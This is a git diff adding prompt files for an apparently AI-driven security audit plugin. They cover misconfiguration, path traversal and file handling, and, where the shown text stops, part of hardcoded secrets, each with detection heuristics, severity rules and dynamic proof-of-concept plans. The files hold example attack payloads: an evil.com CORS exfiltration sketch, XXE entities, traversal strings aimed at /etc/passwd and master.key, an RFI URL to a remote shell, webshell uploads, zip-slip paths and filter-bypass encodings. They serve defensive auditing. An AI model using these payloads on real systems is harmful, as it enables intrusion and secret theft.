+  verifiable config:** actuator behind `SecurityFilterChain` requiring a role;
+  dashboard mounted inside an `authenticate`/`before_action` auth block; metrics
+  bound to `127.0.0.1`/management port not the public listener; endpoint gated by
+  an IP allowlist or service mesh you can see in the repo. Don't assume a
+  perimeter you can't see, but do credit one that's in-repo.
+- **Cookies:** `Secure`/`HttpOnly`/`SameSite` set (directly or via framework
+  secure defaults — Rails 7 secure cookie defaults, Django
+  `SESSION_COOKIE_SECURE=True`, `cookie-session`/`express-session` with proper
+  opts). `HttpOnly` absence is only a finding if the cookie is a session/auth
+  token with a real XSS-assisted theft path; missing `Secure` only matters
+  if served over HTTP/mixed. Missing `X-Frame-Options` is only a finding on
+  state-changing/auth UI with a clickjacking impact — otherwise it's
+  defense-in-depth, skip it.
+- **XML parser is hardened or can't see untrusted input:** DTDs disabled
+  (`disallow-doctype-decl=true`, `XMLConstants.FEATURE_SECURE_PROCESSING`,
+  `setExpandEntityReferences(false)`, external entities/DTD off), `defusedxml`
+  used, `LIBXML_NONET` + entity loader disabled, or the parser only consumes
+  trusted internal/config XML. Stdlib parsers that don't resolve external
+  entities by default (Go `encoding/xml`, most Node XML libs, Crystal/Rust) are
+  not XXE absent an explicit enable flag.
+- **Default credential is dev-only / forced-rotation:** the literal fallback is
+  guarded so prod boot fails if the env var is unset (`raise unless ENV["X"]`),
+  or it's only in `docker-compose.dev.yml`/test fixtures, or the app forces a
+  password change on first login. A weak default that prod can actually run with
+  IS a finding.
+- **Cloud resource is intentionally public & non-sensitive** (a static-asset/CDN
+  bucket serving only public content) — confirm no secrets/PII; otherwise the
+  public ACL on a data bucket is a finding.
+- **No reachable untrusted caller / not the prod build:** the config block is in
+  a sample/`*.example`/test/seed file the running app does not load, or is dead.
+
+If a guard exists but is bypassable (substring origin match, derivable Flask
+debug PIN, actuator "secured" only by an unenforced annotation, env check that
+prod actually trips), it is NOT a mitigation — flag it and name the bypass in
+`sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — unauthenticated, network-reachable: production `DEBUG`/debug
+  console enabling RCE or SECRET_KEY/credential disclosure (Flask Werkzeug
+  console, Django traceback leaking `SECRET_KEY`); exposed actuator `/jolokia`/
+  `/heapdump`/`/env` or `/shutdown`; unauthenticated admin dashboard with
+  privileged actions; default admin creds reachable on the public login; XXE that
+  reads local files / SSRFs / hits OOB with attacker-supplied XML on an unauthed
+  endpoint; world-readable bucket holding secrets/PII.
+- **High** — reflected-origin CORS + `Allow-Credentials` on an authed endpoint
+  (cross-site read of victim data); authenticated-but-broad actuator/metrics leak
+  (env, mappings, threaddump); default creds behind a low barrier; verbose
+  stack-trace/SQL-error page leaking schema/secrets to any caller; XXE limited to
+  OOB/blind or requiring auth.
+- **Medium** — `ACAO:*` without credentials exposing semi-sensitive data;
+  introspection/playground enabled in prod (info disclosure, no creds); metrics
+  endpoint leaking internal hostnames/timings; missing `HttpOnly` on a session
+  cookie with a plausible XSS path; public bucket of non-critical internal data;
+  SG open to the world on a non-critical port.
+- **Low/Info** — missing security header with no concrete exploit (clickjacking
+  on a non-state-changing page), missing `Secure` flag when TLS-only is otherwise
+  enforced, debug flag only reachable in a non-prod env. Generic header hardening
+  with no sink → Info appendix, not the body.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup; list extra locations in
+`rationale`). Fields:
+
+```json
+{
+  "id": "misconfig-001",
+  "title": "Credentialed CORS reflects arbitrary Origin on authed API",
+  "vuln_class": "misconfig",
+  "owasp": "A02:2025",
+  "cwe": "CWE-942",
+  "asvs": "V13",
+  "severity": "high",
+  "status": "likely",
+  "confidence": "high",
+  "file": "src/server.ts",
+  "line": 28,
+  "end_line": 31,
+  "code_excerpt": "app.use(cors({ origin: (o, cb) => cb(null, true), credentials: true }));",
+  "source": "Cross-origin browser request's Origin header (any attacker-controlled site); reaches all routes incl. authenticated /api/account",
+  "sink": "cors() reflects the request Origin into Access-Control-Allow-Origin AND sets Access-Control-Allow-Credentials: true",
+  "data_flow": "attacker page -> fetch('/api/account',{credentials:'include'}) -> server reflects Origin -> browser permits cross-site read of the authed JSON response; no origin allowlist on the path",
+  "sanitizers_checked": "no exact-origin allowlist (origin callback returns true for every origin); credentials NOT disabled; not gated to dev; route requires a session cookie that is auto-sent cross-site (SameSite not Strict), so reflection is exploitable",
+  "rationale": "Any malicious origin can read authenticated responses for a logged-in victim. Same config governs /api/* (12 routes). Distinct from the ACAO:* + credentials non-case because the origin is reflected, which browsers DO honor with credentials.",
+  "exploit_sketch": "Host evil.com page: fetch('https://target/api/account',{credentials:'include'}).then(r=>r.text()).then(exfil). Browser sends victim cookies, server reflects evil.com, response is readable.",
+  "dynamic_poc_plan": "curl with Origin: https://evil.com against /api/account using a valid session cookie; observe response headers ACAO: https://evil.com and ACAC: true mirroring the attacker origin.",
+  "proposed_fix": "Constrain credentialed CORS to a fixed set of trusted origins instead of reflecting arbitrary ones, so cross-site reads of authed responses are no longer possible. High-level direction, not a patch — the exact allowlist and enforcement are left to the engineer."
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, `sanitizers_checked` must be
+concrete and true. For setting-exposure findings, `source` is the untrusted
+caller/origin that reaches the surface and `sink` is the precise directive; for
+XXE, `source` is the attacker XML and `sink` is the entity-resolving parse call.
+`data_flow` shows how the untrusted caller reaches the misconfigured surface and
+why no env-gate/auth/allowlist stops it. `sanitizers_checked` is the §4 FP guard
+made explicit — list each relevant guard and state it is absent or name the
+exact bypass. Verify the **production/default** value, not a dev override. Use
+`status:"likely"` for a proven static config + reachability, `"confirmed"` only
+after dynamic repro, `"triage"` if reachability/prod-applicability is uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove the *running* app exposes the surface to an untrusted caller. Build &
+boot the target in the isolated worktree (docker-first) in its production-like
+mode, then:
+
+- **Debug/error leak:** trigger an unhandled error (malformed input, missing
+  param, bad type) and `curl` the route. **Proof:** response body contains a
+  stack trace, framework debug page, `SECRET_KEY`/env dump, SQL, or source. For
+  Flask debug, hit `/console` and show the interactive prompt (do not run code
+  beyond a benign `1+1`).
+- **CORS:** `curl -H 'Origin: https://evil.example' -i <endpoint>`. **Proof:**
+  `Access-Control-Allow-Origin: https://evil.example` (reflected) together with
+  `Access-Control-Allow-Credentials: true`, or `ACAO: *` on sensitive data. Note
+  the inert `*`+credentials combo is NOT proof.
+- **Management/admin/metrics:** unauthenticated `curl /actuator/env`,
+  `/actuator/heapdump`, `/metrics`, `/debug/pprof/`, GraphQL
+  `{__schema{types{name}}}`, Swagger JSON, or the dashboard root. **Proof:** 200
+  with internal data (env vars, heap, metrics, schema) and no auth challenge.
+- **Default creds:** POST the shipped default to the login/admin endpoint.
+  **Proof:** authenticated session / 200 with a privileged token.
+- **XXE:** POST an XML body with a DOCTYPE pulling a local file or an OOB
+  callback: `<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/hostname">]><r>&x;</r>`
+  (or `SYSTEM "http://<listener>/xxe-<nonce>"` for blind). **Proof:** response
+  echoes the file content, or the auditor's listener logs the nonce hit from the
+  server. Use `/etc/hostname` (benign) for the read demo.
+- **Public bucket:** anonymous `GET` of the object URL (no creds/SDK). **Proof:**
+  200 returning the object to an unauthenticated client.
+
+Record the exact request and observed evidence in the `Repro` object
+(`reproduced`, `method:"live-exploit"`, `poc`, `observed`, `impact`). If only the
+config is provable but the live surface can't be booted, downgrade to a static
+trace (`status:"likely"`, `method:"static-poc"`) and say so in `notes`.
diff --git a/plugins/security/prompts/finders/path-file.md b/plugins/security/prompts/finders/path-file.md
new file mode 100644
index 0000000..0f3d698
--- /dev/null
+++ b/plugins/security/prompts/finders/path-file.md
@@ -0,0 +1,337 @@
+<!--
+FINDER PROMPT — path-file. You are a fresh-context auditor hunting ONE class:
+Path Traversal & File Handling (directory traversal, LFI/RFI, unrestricted/
+unsafe file upload, zip-slip archive extraction, user-controlled file paths).
+Read the target's code; emit finding objects. Signal discipline (AGENTS.md) is
+binding: only a REACHABLE untrusted-input → filesystem/include sink, where the
+input controls the resolved path/name/destination AND no effective canonicalize-
+and-confine check sits on the path, is a finding. No defense-in-depth musings,
+no dead code, no posture items.
+-->
+
+# Finder — Path Traversal & File Handling (`path-file`)
+
+**Class key:** `path-file` · **OWASP:** A01:2025 · **CWE:** CWE-22 (path
+traversal) / CWE-98 (PHP file include / RFI) / CWE-73 (external control of
+filename or path) / CWE-434 (unrestricted upload of dangerous file type) ·
+**ASVS:** V5
+
+## 1. Objective
+
+Find places where untrusted input controls *which* file or directory the server
+reads, writes, includes, serves, or extracts to — such that the attacker escapes
+the intended base directory (`../`, absolute path, symlink), reads/overwrites
+arbitrary files, includes attacker code (LFI/RFI), or lands an
+executable/dangerous file in a served/executed location. The bug is the resolved
+path/destination being attacker-influenced and not confined to a safe root.
+
+## 2. Where to look
+
+Entry points where a request value becomes part of a path, filename, include
+target, or extraction destination:
+
+- **File download / static serving:** `/download?file=`, `/files/:name`,
+  `/attachments/:id/raw`, `sendFile`/`send_file`/`X-Sendfile` handlers,
+  documentation/asset servers, `?template=`, `?page=`, `?view=`, `?lang=`,
+  `?theme=`, report/export downloaders, "view source"/log viewers, avatar/media
+  fetchers keyed by a user-supplied name.
+- **File upload:** multipart handlers that derive the *stored* path/name from the
+  client filename or a `Content-Type`/extension, "import"/"attachment"/"profile
+  picture"/"resume" endpoints, chunked-upload assemblers, S3/GCS key builders
+  fed the original filename, profile/CMS media managers.
+- **Archive / package extraction (zip-slip):** zip/tar/gzip/7z/rar extractors,
+  plugin/theme/template installers, backup restore, "import project", container/
+  image layer unpackers, anything iterating archive entries and joining
+  `entry.name` to an output dir.
+- **Includes / dynamic loading (LFI/RFI):** template engine paths, `require`/
+  `include`/`import` of a user-named module/partial, i18n/locale file loaders,
+  config/plugin loaders that build a path from input, `render(params[:template])`.
+- **Path-building utilities:** any `join`/`+`/interpolation that concatenates a
+  base dir with a request value, then opens/reads/writes/deletes it; log file
+  selectors; `fopen`/`open`/`File.read`/`unlink`/`rmdir` with a computed name.
+
+Route/handler param signals to grep: `file`, `filename`, `name`, `path`, `dir`,
+`folder`, `doc`, `page`, `template`, `view`, `include`, `require`, `module`,
+`lang`, `locale`, `theme`, `skin`, `report`, `export`, `download`, `attachment`,
+`asset`, `media`, `image`, `avatar`, `src`, `dest`, `target`, `key`, `id` (when
+mapped to a path), `archive`, `zip`, `upload`. Watch for `..`, leading `/`,
+drive letters (`C:\`), and NUL (`%00`) appearing in tests/fixtures — they hint
+where the dev already worried about traversal.
+
+Per-language SINK signals:
+
+- **Crystal:** `File.read/open/write/delete`, `File.join(base, x)`,
+  `Dir.glob`, `send_file env, path`, Kemal/Lucky static handlers; archive via
+  `Compress::Zip::Reader` joining `entry.filename`.
+- **Ruby:** `File.read/open/binread/write/delete`, `File.join(base, params[:f])`,
+  `IO.read`, `send_file`/`send_data path`, `Rack::File`/`Rack::Static`,
+  `render file:`/`render template:` with input, `Kernel#load`/`require` of a
+  computed path, `Zip::File.open` / `Gem::Package::TarReader` entry-name joins,
+  `FileUtils.cp/mv` to a derived dest, `Marshal.load(File.read(x))`.
+- **Node/TS:** `fs.readFile/readFileSync/createReadStream/writeFile/unlink`,
+  `path.join(base, req.params.x)`, `res.sendFile(p)`, `express.static`,
+  `res.download(p)`, `require(userPath)`, `import(userPath)`,
+  template `res.render(req.query.view)`; unzip via `unzipper`/`adm-zip`
+  `entry.path`, `tar.x` without `filter`/`strip`, `decompress`.
+- **Python:** `open(path)`, `os.path.join(base, x)`, `pathlib.Path(base)/x`,
+  `send_file(p)`/`send_from_directory(dir, x)` (the latter is the safe one *if*
+  used correctly), `flask.render_template(x)`, `shutil.copy/move`,
+  `zipfile.ZipFile.extract/extractall`, `tarfile.extractall` (no `filter=` /
+  pre-3.12), `importlib.import_module(x)`, `pickle.load(open(x))`.
+- **Go:** `os.Open/ReadFile/Create/WriteFile/Remove`, `filepath.Join(base, x)`,
+  `http.ServeFile(w, r, p)`, `http.Dir`/`FileServer` rooted at a bad base,
+  `template.ParseFiles(x)`; archive via `zip.OpenReader` + `filepath.Join(dst,
+  f.Name)`, `tar.Next()` header `Name` joined to dst.
+- **PHP:** `include`/`include_once`/`require`/`require_once($x)` (LFI/RFI — the
+  marquee sink), `file_get_contents($x)`, `fopen($x)`, `readfile($x)`,
+  `file($x)`, `unlink($x)`, `move_uploaded_file($tmp, $dest)` with derived dest,
+  `fputs`/`fwrite` to a computed path, `ZipArchive::extractTo($dir)`,
+  `phar://`/`zip://`/`php://filter` wrapper abuse.
+- **Java:** `new File(base, x)` / `Paths.get(base, x)` then `Files.read*/write*/
+  newInputStream`, `FileInputStream(x)`, `Files.copy`, `response.sendRedirect`/
+  `getResourceAsStream(x)`, `RequestDispatcher.include/forward(userPath)`,
+  Spring `Resource`/`ResourceLoader.getResource(x)`, `ServletContext.getRealPath`;
+  archive via `ZipInputStream` + `new File(dir, entry.getName())`,
+  `TarArchiveInputStream`.
+- **Rust:** `std::fs::read/write/File::open/remove_file`, `Path::join(base, x)` /
+  `base.join(x)`, `PathBuf::from(x)`, actix/axum static-file or
+  `NamedFile::open(p)`; archive via `zip::ZipArchive` `file.enclosed_name()`
+  (the safe call) vs joining `file.name()` raw, `tar::Archive::unpack`.
+
+## 3. Detection heuristics
+
+**Taint SOURCES** (untrusted): HTTP query/body/path-segment/header/cookie values,
+the **client-supplied multipart filename** (`Content-Disposition` `filename=`),
+`Content-Type`/declared extension, JSON/form fields naming a file, **archive
+entry names** (`zip`/`tar` member paths — the attacker authored the archive, so
+every entry name is tainted), message-queue/webhook payloads, and **DB rows that
+were originally user-set** (stored path injection — a filename saved earlier,
+later joined into a read/serve path). Also: `Location`/symlink targets the code
+follows, and URLs in include directives (RFI).
+
+**Taint SINKS** (dangerous op): the language-specific calls in §2 where the
+tainted value determines the **resolved path, filename, include target, or
+extraction destination** — i.e. it is joined/concatenated/interpolated into a
+path then opened/read/written/deleted/served, passed to `include`/`require`/
+`import`/`render`, or used as (part of) an archive-extraction output path.
+
+Vulnerable patterns to confirm:
+
+- **Classic `../` traversal (read):** `File.read(File.join("uploads",
+  params[:file]))` / `open(os.path.join(BASE, name))` /
+  `fs.readFile(path.join(dir, req.params.name))` with no canonicalize-and-confine
+  → `name="../../../../etc/passwd"`. On Windows also `..\\` and `C:\\`.
+- **Absolute-path override:** some join/resolve semantics let an *absolute*
+  second arg discard the base — Python `os.path.join("/srv", "/etc/passwd") ==
+  "/etc/passwd"`, Node `path.resolve(base, x)`, Java `Paths.get(base).resolve(x)`,
+  Rust `base.join(x)`. (Ruby `File.join`, Node `path.join`, Go `filepath.Join`,
+  Java `new File(base, x)` keep the base.) So even input with no `..` can escape.
+- **Traversal write / overwrite (more severe):** upload or write where the
+  destination derives from input → overwrite `~/.ssh/authorized_keys`, a cron
+  file, a web-root script, or app config. `move_uploaded_file($tmp,
+  "uploads/".$_FILES['f']['name'])` with `name="../config.php"`.
+- **Zip-slip / tar-slip:** loop over archive entries joining the entry name to an
+  output dir *without* verifying the resolved path stays under the dir →
+  `entry.name = "../../../../etc/cron.d/x"`. Tells: `new File(dir,
+  entry.getName())`, `filepath.Join(dst, hdr.Name)`, `path.join(out,
+  entry.path)`, `zipEntry.extractTo($dir)` with no per-entry confinement, and
+  symlink entries pointing outside (tar symlink slip). The safe calls
+  (`enclosed_name()`, `tarfile` `filter='data'`, `tar.x` with a `filter`) are
+  often *available but unused* right beside the vuln.
+- **LFI:** `include $_GET['page'].".php"` / `require($base.$x)` /
+  `render(params[:template])` / `res.render(req.query.view)` — attacker reads/
+  executes local files (`../../../../etc/passwd%00`,
+  `php://filter/convert.base64-encode/resource=config.php`, log poisoning → code exec).
+- **RFI:** `include($_GET['mod'])` with `allow_url_include`/`allow_url_fopen`, or
+  `require(userUrl)` / dynamic `import(remoteUrl)` → attacker includes
+  `http://evil/shell.txt` for RCE.
+- **Unrestricted / unsafe upload:** stored file gets an attacker-chosen extension
+  *and* lands in a served/executed dir → upload `shell.php`/`x.jsp`/`.aspx` into
+  the web root → RCE. Also: extension/`Content-Type` allowlist that is bypassable
+  (`shell.php.jpg`, `shell.pHp`, double extension, `.phtml`/`.php5`, NUL/`;`
+  truncation, polyglot, `.htaccess`/`web.config` upload re-enabling exec).
+- **Filename used unsanitized for storage:** `filename` from the client used as
+  the on-disk name without stripping the directory component → traversal *and*
+  collision/overwrite.
+- **Null-byte / encoding truncation:** `%00`, double-URL-encoding (`%252e%252e`),
+  overlong UTF-8, `..%2f`, `..\\`, mixed separators — used to slip past naive
+  string checks (still relevant in some runtimes / native libs).
+- **Second-order:** filename/path saved safely, later read and joined into a
+  read/serve/delete path without re-confinement.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these is present AND effective on the path:
+
+- **Canonicalize-then-confine** (the gold standard): code resolves the path to its
+  real, absolute, symlink-free form and verifies it is *inside* the intended base
+  before use — `File.realpath`/`Pathname#realpath` + prefix check, Node
+  `fs.realpathSync(p)` then `resolved.startsWith(baseReal + path.sep)`, Python
+  `os.path.realpath`/`Path.resolve()` + `is_relative_to(base)`, Go
+  `filepath.EvalSymlinks` (after `filepath.Abs`) then
+  `strings.HasPrefix(real, base+sep)`, Java `getCanonicalPath()` or
+  `Path.toRealPath()` + bounded `startsWith`, Rust `canonicalize()` + `starts_with`. The
+  prefix check must use the *canonical/real* path (resolves `..` and symlinks)
+  and a separator-bounded prefix (so `/srv/dataEVIL` doesn't match `/srv/data`).
+- **Framework safe-serve API used correctly:** Flask `send_from_directory(dir,
+  name)` (rejects `..`/absolute), Rails `send_file` with a value derived from a
+  whitelisted id (not raw user path), Django `FileResponse` of a path validated
+  against a root, Go `http.ServeFile` *only* when the path is confined and
+  `r.URL.Path` is cleaned, Spring serving a `Resource` resolved under a root with
+  `..` rejected. The API alone isn't enough — confirm the *input* it receives is
+  confined or id-mapped.
+- **Indirect mapping / opaque id:** user supplies an id/key looked up in a DB or a
+  fixed map that yields the real path; the raw user string never touches the
+  filesystem path. This fully closes traversal — safe.
+- **Closed allowlist of names/paths:** input matched against a fixed set
+  (`{"en"=>"en.json", ...}`, enum of allowed templates) before building the path.
+- **Strict basename + extension allowlist on the path:** `File.basename`/
+  `path.basename`/`os.path.basename` strips any directory component AND the
+  result is validated (allowlisted extension, no leading dot/slash) AND it is
+  joined under a confined base. Basename *alone* still permits absolute-discard on
+  some `join`s and doesn't stop overwrite-within-dir — credit it only when
+  combined with confinement.
+- **Upload safety done right:** stored name is server-generated (UUID/hash), the
+  storage dir is **outside any served/executed root** (or served with execution
+  disabled — static-only, no script handler, `X-Content-Type-Options: nosniff`),
+  and type is validated by content sniff (magic bytes) not just extension/declared
+  `Content-Type`. All three together ⇒ not a finding.
+- **Archive extraction confined:** each entry's resolved destination is checked to
+  stay under the output dir before write (`enclosed_name()`, `tarfile`
+  `filter='data'` on 3.12+/backport, `tar.x({filter})`, explicit
+  `resolved.startsWith(outReal+sep)` per entry), symlink entries are rejected/
+  skipped, and entry size/count limits exist (the slip is closed even if a
+  zip-bomb remains — note bomb separately if present).
+- **No untrusted source on the path:** the path component is a hardcoded constant,
+  an operator/config value, an internal enum, or a typed/validated id that cannot
+  carry separators (`:id(\d+)` route, integer cast). A path built entirely from
+  trusted parts is not a finding.
+
+If a guard exists but is bypassable, it is NOT a mitigation — flag it and name the
+exact bypass in `sanitizers_checked`. Specifically reject as ineffective:
+**denylist string-replace** (`replace("../","")` — defeated by `....//`,
+`..%2f`, absolute path, or a single non-recursive pass), **prefix check on the
+non-canonical string** (doesn't resolve symlinks/`..`), **un-separator-bounded
+prefix** (`startsWith("/srv/data")` matches `/srv/data-evil`), **`..`-only
+filtering that ignores absolute paths / drive letters / null bytes**,
+**extension/`Content-Type` allowlist alone** for uploads (sniff bypass, double
+extension, `.htaccess`), and **`basename` applied but the dir is still served as
+executable**.
+
+## 5. Severity guidance
+
+- **Critical** — unauthenticated, reachable: **RFI / LFI-to-RCE** (include of an
+  attacker URL or local file that gets executed; log-poisoning chain), **upload
+  of an executable into a served/executed dir → webshell RCE**, **zip-slip /
+  traversal *write*** that overwrites a startup script / cron / `authorized_keys`
+  / app code → RCE or full auth bypass, or arbitrary-file-**read** of secrets that
+  yields immediate compromise (e.g. reading `.env`/private keys → game over).
+  Attacker fully controls the resolved path/destination.
+- **High** — authenticated or realistically-conditioned arbitrary file read
+  (`/etc/passwd`, app source, other tenants' files), traversal write/overwrite
+  behind an auth wall, or upload-to-RCE requiring a known but reachable served
+  path; zip-slip behind authn.
+- **Medium** — constrained traversal: read limited to a subtree or to a fixed
+  extension, partial mitigation (basename applied but absolute-path or symlink
+  gap remains), blind/whitelisted-but-bypassable, or file *delete* of low-value
+  targets. Upload with weak type checks but storage outside any exec root (no RCE,
+  possible stored XSS/content-spoof — note the secondary impact).
+- **Low/Info** — traversal provably confined to non-sensitive files with effective
+  basename+confinement leaving only a minor predictable-name/info concern, or a
+  theoretical join where input cannot carry separators. Usually downgrade or drop
+  per §4.
+
+Second-order/stored path injection keeps the severity of its eventual sink; note
+the write→read persistence in `rationale`.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup call sites; list extras in
+`rationale`). Fields:
+
+```json
+{
+  "id": "path-file-001",
+  "title": "Unauthenticated arbitrary file read via traversal in /download?file=",
+  "vuln_class": "path-file",
+  "owasp": "A01:2025",
+  "cwe": "CWE-22",
+  "asvs": "V5",
+  "severity": "high",
+  "status": "likely",
+  "confidence": "high",
+  "file": "app/controllers/downloads_controller.rb",
+  "line": 12,
+  "end_line": 14,
+  "code_excerpt": "path = File.join(Rails.root.join(\"storage\"), params[:file])\n  send_file path",
+  "source": "params[:file] — GET /download query string; route has no auth filter (before_action :authenticate missing on this action)",
+  "sink": "File.join(storage, params[:file]) -> send_file path — opens and streams a path the caller controls",
+  "data_flow": "params[:file] -> File.join(storage_root, params[:file]) -> send_file; File.join does not resolve or confine, so '../' segments escape storage_root; no realpath+prefix check between source and sink",
+  "sanitizers_checked": "no File.basename (directory component preserved); no realpath/canonicalize + base-prefix confinement; no allowlist/id-mapping; no extension restriction; File.join keeps the base even for a leading-slash arg, so escape is via '../' segments only; not the send_from_directory-style safe API",
+  "rationale": "Reachable from unauth route; file=../../../../etc/passwd resolves outside storage and is streamed back. Same unconfined join at reports_controller.rb:40 (export download).",
+  "exploit_sketch": "GET /download?file=../../../../../../etc/passwd -> response body is /etc/passwd; file=../../config/master.key leaks the Rails secret.",
+  "dynamic_poc_plan": "Against the running app, request /download?file=../../../../etc/passwd and a control file=readme.txt; confirm the traversal response returns the host file (root:x:0:0 line) while the control returns the in-dir file, proving escape from storage_root.",
+  "proposed_fix": "Confine the served path to the storage root and stop letting raw user input determine it — resolve+confine to the base (or map an opaque id to the stored path) so '../'/absolute segments cannot escape. High-level direction, not a patch; the implementing engineer chooses the exact mechanism and code."
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. `data_flow` traces the variable source→sink and states why the
+resolved path/destination is attacker-influenced and unconfined (join/concat/
+include/extract), naming any guard encountered and why it fails.
+`sanitizers_checked` is the FP guard made explicit — list each §4 control and state it is
+absent or, if present, name the exact bypass (e.g. "replace('../','') is
+single-pass — `....//` survives", "prefix check on the pre-realpath string —
+symlink bypass", "extension allowlist only — `shell.php.jpg` / sniff bypass").
+A finding without an untrusted source reaching a real filesystem/include sink in
+path-determining position is not a finding. Pick `cwe` by subtype: 22 traversal,
+98 PHP include/RFI, 73 external control of filename/path, 434 unrestricted upload.
+Use `status:"likely"` for a proven static trace, `"confirmed"` only after dynamic
+repro, `"triage"` if reachability/source is uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove the running app resolves the path/destination outside its intended
+root (or executes/serves an attacker file). Pick the oracle matching the subtype:
+
+1. **Read traversal — host-file oracle.** Send the traversal payload and a benign
+   control to the same endpoint:
+   `?file=../../../../../../etc/passwd` vs `?file=<known-in-dir-file>`.
+   **Observed proof** = the traversal response returns content that only exists
+   outside the base (the `root:x:0:0:` line of `/etc/passwd`, or the app's
+   `.env`/`config/master.key`/private key), while the control returns the in-dir
+   file. Try encodings if a naive filter is present: `..%2f`, `%252e%252e%252f`,
+   `....//`, `..\\` (Windows), trailing `%00`/`.jpg` truncation.
+2. **Write / zip-slip — landed-file oracle.** Upload or extract a crafted
+   archive whose entry name escapes the output dir
+   (`../../../../tmp/pwn-<nonce>` or, for impact, a path under a writable
+   exec/startup dir). **Observed proof** = the file appears at the out-of-dir
+   absolute path after extraction (`ls /tmp/pwn-<nonce>` / read it back),
+   confirming the join wrote outside the destination. For overwrite impact, target
+   a benign sentinel file and show its contents changed.
+3. **Upload-to-RCE — webshell oracle.** Upload a file with an executable
+   extension and a unique marker payload (e.g. a script printing the nonce), then
+   request its served URL. **Observed proof** = fetching the uploaded path returns
+   the *executed* output (the computed nonce), not the source — proving the file
+   landed in an executable, served location. If exec is blocked but the file is
+   served raw with an attacker MIME, demonstrate stored-XSS/content-spoof instead
+   and downgrade impact accordingly.
+4. **LFI/RFI — include oracle.** For LFI, point the include/template/page param at
+   a readable local file or `php://filter/convert.base64-encode/resource=<src>`;
+   **observed proof** = file contents (or base64 source) appear in the response.
+   For RFI, host a marker payload on a listener the auditor controls and set the
+   include param to that URL; **observed proof** = the listener is hit AND the
+   remote payload's output (nonce) appears in the response — proving remote
+   inclusion/execution.
+
+Run the relevant bypass checks when a partial guard exists: denylist evasion
+(`....//`, double-encoding, mixed/absolute paths, drive letters, NUL truncation),
+non-canonical prefix-check evasion (symlink inside the base pointing out;
+`baseEVIL` prefix collision), and upload type-check evasion (double extension,
+case, polyglot, `.htaccess`/`web.config`). Record the exact request/payload and
+the observed out-of-root evidence in the `Repro` object (`reproduced`,
+`method:"live-exploit"`, `poc`, `observed`, `impact`). An out-of-band callback (RFI)
+or a landed out-of-dir file (zip-slip) alone proves the class — set
+`method:"live-exploit"`. If the app can't be run, fall back to a focused unit test
+that drives the sink with the traversal/slip payload and asserts the resolved path
+escapes the base (`method:"unit-test"`).
diff --git a/plugins/security/prompts/finders/secrets.md b/plugins/security/prompts/finders/secrets.md
new file mode 100644
index 0000000..f6226c5
--- /dev/null
+++ b/plugins/security/prompts/finders/secrets.md
@@ -0,0 +1,311 @@
+<!--
+FINDER PROMPT — secrets. You are a fresh-context auditor hunting ONE class:
+Hardcoded Secrets & Credentials. Read the target's code, config, and history;
+emit finding objects. Signal discipline (AGENTS.md) is binding: a finding is a
+REAL secret that grants an attacker access to a REAL resource — a key/token/
+password embedded in code/config/history, or a weak default credential, where
+the credential is live (or trivially reachable) and not a placeholder, test
+fixture, public/non-secret value, or already-rotated artifact. No "rotate keys"
+musings without a concrete live secret, no flagging env-var reads, no entropy
+nags on non-secret strings, no posture items.
+-->
+
+# Finder — Hardcoded Secrets & Credentials (`secrets`)
+
+**Class key:** `secrets` · **OWASP:** A02:2025 (Security Misconfiguration — secret
+management) · **CWE:** CWE-798 (use of hard-coded credentials) / CWE-259
+(hard-coded password) / CWE-321 (hard-coded cryptographic key) / CWE-547
+(hard-coded sensitive constants) · **ASVS:** V14 (Configuration & Secret
+Management)
+
+## 1. Objective
+
+Find a **real, usable secret embedded in the source, config, build artifacts, or
+git history** — an API key, token, password, private key, connection string with
+credentials, or a weak/default credential the app ships with — such that anyone
+who can read the repo (or a fetched dependency/image) can authenticate as the
+app, decrypt its data, or take over an account. The bug is the secret's presence
+and liveness, not merely that "a secret exists somewhere."
+
+## 2. Where to look
+
+A secret is a finding when **(a) it is genuinely secret material, (b) it is live
+or trivially live, and (c) an attacker can read it** (public repo, leaked source,
+shipped binary/image, npm/gem package, git history). Map those three before
+flagging. Surfaces:
+
+- **Source literals:** assignments to `*_key`, `*_secret`, `*_token`,
+  `*password*`, `apikey`, `client_secret`, `access_token`, `private_key`,
+  `auth`, `bearer`, `signing_key`, `encryption_key`, `webhook_secret`, DSNs.
+  Inline in service-client constructors (S3/Stripe/Twilio/SendGrid/OpenAI/
+  Slack/GitHub/DB drivers), HTTP auth headers, and CI/deploy scripts.
+- **Config & infra files:** `.env`, `.env.*` (committed!), `config/*.yml`,
+  `application.properties`, `appsettings.json`, `settings.py`, `wp-config.php`,
+  `docker-compose.yml`, `Dockerfile` (`ENV`/`ARG SECRET=`), `k8s` manifests &
+  ConfigMaps (vs Secrets), `terraform/*.tf` + `*.tfvars`, `serverless.yml`,
+  `*.plist`, mobile `strings.xml`/`Info.plist`, `.npmrc`/`.pypirc`/`.netrc`,
+  `database.yml`, plaintext `secrets.yml` (or `credentials.yml.enc` committed
+  alongside its `master.key`), Helm `values.yaml`.
+- **Key material files:** committed `*.pem`/`*.key`/`id_rsa`/`*.p12`/`*.pfx`/
+  `*.jks`/`*.keystore`/`*.ppk`/`serviceAccount*.json` (GCP)/`*.kubeconfig`/
+  `*.crt` with private half/`*.gpg`/`*.asc` private blocks.
+- **Default / fallback credentials:** `admin/admin`, `root` with empty/known
+  password seeded in migrations/seeders/bootstrap, `password ||= "changeme"`,
+  `ENV["X"] || "hardcoded-fallback"`, dev creds reused in prod, default JWT/
+  session/encryption secret baked into the framework config when unset.
+- **Git history (critical surface):** secrets removed from HEAD but **still in
+  history** — `git log -p`, `git rev-list --all`, deleted `.env`, a key rotated
+  in a later commit but the old value still reachable. A removed secret that was
+  never rotated is still live.
+- **Build/CI:** `.github/workflows/*` / `.gitlab-ci.yml` / `Jenkinsfile` /
+  `.circleci/config.yml` with `echo $TOKEN` into logs, hardcoded registry/cloud
+  creds, `with:` inputs holding tokens (vs `secrets.X`), base64'd kubeconfigs.
+- **Frontend/client bundles:** secrets shipped to the browser/mobile/desktop —
